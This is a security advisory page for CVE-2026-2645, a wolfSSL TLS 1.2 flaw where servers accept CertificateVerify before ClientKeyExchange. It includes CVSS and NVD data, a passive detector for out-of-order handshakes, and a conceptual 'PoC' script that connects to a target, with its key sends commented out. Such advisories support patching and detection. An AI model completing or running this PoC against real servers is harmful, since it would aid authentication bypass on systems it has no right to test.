Security Vulnerability Report
CVE-2026-2645 CVSS 7.5 HIGH

CVE-2026-2645

Published: 2026-03-19 18:16:22
Last Modified: 2026-04-29 18:47:49

Description

In wolfSSL 5.8.2 and earlier, a logic flaw existed in the TLS 1.2 server state machine implementation. The server could incorrectly accept the CertificateVerify message before the ClientKeyExchange message had been received. This issue affects wolfSSL before 5.8.4 (wolfSSL 5.8.2 and earlier is vulnerable, 5.8.4 is not vulnerable). In 5.8.4 wolfSSL would detect the issue later in the handshake. 5.9.0 was further hardened to catch the issue earlier in the handshake.
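
The message ordering described above can be checked passively on a captured client-to-server byte stream, because in an initial TLS 1.2 handshake both ClientKeyExchange and CertificateVerify are sent in plaintext before ChangeCipherSpec. The detector below is an added example, not code from wolfSSL or from this report; its function names and the sample flights (dummy message bodies) are constructed for illustration.

```python
import struct

HANDSHAKE, CHANGE_CIPHER_SPEC = 22, 20            # TLS record content types
CLIENT_KEY_EXCHANGE, CERTIFICATE_VERIFY = 16, 15  # handshake message types

def record(content_type, payload):
    """Frame a payload as one TLS 1.2 record (sample-data helper)."""
    return struct.pack('!BBBH', content_type, 3, 3, len(payload)) + payload

def handshake(msg_type, body=b'\x00' * 4):
    """Frame a handshake message: 1-byte type, 3-byte length, dummy body."""
    return bytes([msg_type]) + len(body).to_bytes(3, 'big') + body

def client_handshake_types(stream):
    """List plaintext handshake message types in a client-to-server stream.

    Handles messages coalesced into or split across records, and stops at
    ChangeCipherSpec because later records are encrypted.
    """
    buf, pos = b'', 0
    while pos + 5 <= len(stream):
        ctype, _, _, length = struct.unpack('!BBBH', stream[pos:pos + 5])
        if ctype == CHANGE_CIPHER_SPEC:
            break
        if ctype == HANDSHAKE:
            buf += stream[pos + 5:pos + 5 + length]
        pos += 5 + length
    types, off = [], 0
    while off + 4 <= len(buf):
        end = off + 4 + int.from_bytes(buf[off + 1:off + 4], 'big')
        if end > len(buf):
            break  # truncated capture: ignore the incomplete message
        types.append(buf[off])
        off = end
    return types

def cert_verify_before_cke(stream):
    """True if CertificateVerify appears with no ClientKeyExchange before it."""
    types = client_handshake_types(stream)
    if CERTIFICATE_VERIFY not in types:
        return False
    return CLIENT_KEY_EXCHANGE not in types[:types.index(CERTIFICATE_VERIFY)]

# Constructed sample flights (never sent anywhere): 1 = ClientHello, 11 = Certificate.
CCS = record(CHANGE_CIPHER_SPEC, b'\x01')
IN_ORDER = (record(HANDSHAKE, handshake(1))
            + record(HANDSHAKE, handshake(11) + handshake(16) + handshake(15)) + CCS)
CV = handshake(15)  # split across two records below to exercise reassembly
OUT_OF_ORDER = (record(HANDSHAKE, handshake(1)) + record(HANDSHAKE, handshake(11))
                + record(HANDSHAKE, CV[:3]) + record(HANDSHAKE, CV[3:]) + CCS)
```

`cert_verify_before_cke(OUT_OF_ORDER)` flags the constructed out-of-order flight, while `IN_ORDER` and captures that contain no CertificateVerify are not flagged.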

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:wolfssl:wolfssl:*:*:*:*:*:*:*:* - VULNERABLE
wolfSSL <= 5.8.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket
import struct

# Conceptual PoC for CVE-2026-2645
# This script demonstrates sending a TLS 1.2 handshake where
# CertificateVerify is sent before ClientKeyExchange.

def create_tls_record(content_type, version, data):
    # Record header: content type, then major and minor version (1 byte each),
    # followed by the 2-byte payload length.
    header = struct.pack('!BBB', content_type, version[0], version[1])
    return header + struct.pack('!H', len(data)) + data

def build_handshake(msg_type, data):
    # Handshake header: 1-byte message type and 3-byte length.
    return struct.pack('!B', msg_type) + struct.pack('!I', len(data))[1:] + data

def exploit(target_ip, target_port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_ip, target_port))

    # 1. Send ClientHello
    # ... (Omitted standard ClientHello construction for brevity) ...
    # client_hello = ...
    # s.send(create_tls_record(22, (0x03, 0x03), client_hello))

    # 2. Receive ServerHello, Certificate, ServerHelloDone
    # response = s.recv(4096)

    # 3. Send Client Certificate (if requested)

    # 4. VULNERABILITY: Send CertificateVerify WITHOUT sending ClientKeyExchange
    # Normally, the state machine should reject this.
    # In vulnerable wolfSSL versions, this is accepted.
    # cert_verify_data = build_handshake(15, b'...')
    # s.send(create_tls_record(22, (0x03, 0x03), cert_verify_data))

    print("[+] PoC logic: Sending CertificateVerify before ClientKeyExchange")
    print("[+] Check server response to see if handshake continues or fails unexpectedly")
    s.close()

# exploit("127.0.0.1", 443)
```

References

https://github.com/wolfSSL/wolfssl/pull/9694 (Issue Tracking, Patch)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2645", "sourceIdentifier": "[email protected]", "published": "2026-03-19T18:16:22.043", "lastModified": "2026-04-29T18:47:49.063", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In wolfSSL 5.8.2 and earlier, a logic flaw existed in the TLS 1.2 server state machine implementation. The server could incorrectly accept the CertificateVerify message before the ClientKeyExchange message had been received. This issue affects wolfSSL before 5.8.4 (wolfSSL 5.8.2 and earlier is vulnerable, 5.8.4 is not vulnerable). In 5.8.4 wolfSSL would detect the issue later in the handshake. 5.9.0 was further hardened to catch the issue earlier in the handshake."}, {"lang": "es", "value": "En wolfSSL 5.8.2 y versiones anteriores, existía una falla lógica en la implementación de la máquina de estados del servidor TLS 1.2. El servidor podría aceptar incorrectamente el mensaje CertificateVerify antes de que se hubiera recibido el mensaje ClientKeyExchange. Este problema afecta a wolfSSL anterior a 5.8.4 (wolfSSL 5.8.2 y versiones anteriores son vulnerables, 5.8.4 no es vulnerable). En 5.8.4, wolfSSL detectaría el problema más tarde en el handshake. 
5.9.0 fue endurecido aún más para detectar el problema antes en el handshake."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", 
"confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-358"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wolfssl:wolfssl:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.8.4", "matchCriteriaId": "8382D04F-D02F-41EC-8A17-6D6FA9FFA176"}]}]}], "references": [{"url": "https://github.com/wolfSSL/wolfssl/pull/9694", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}]}}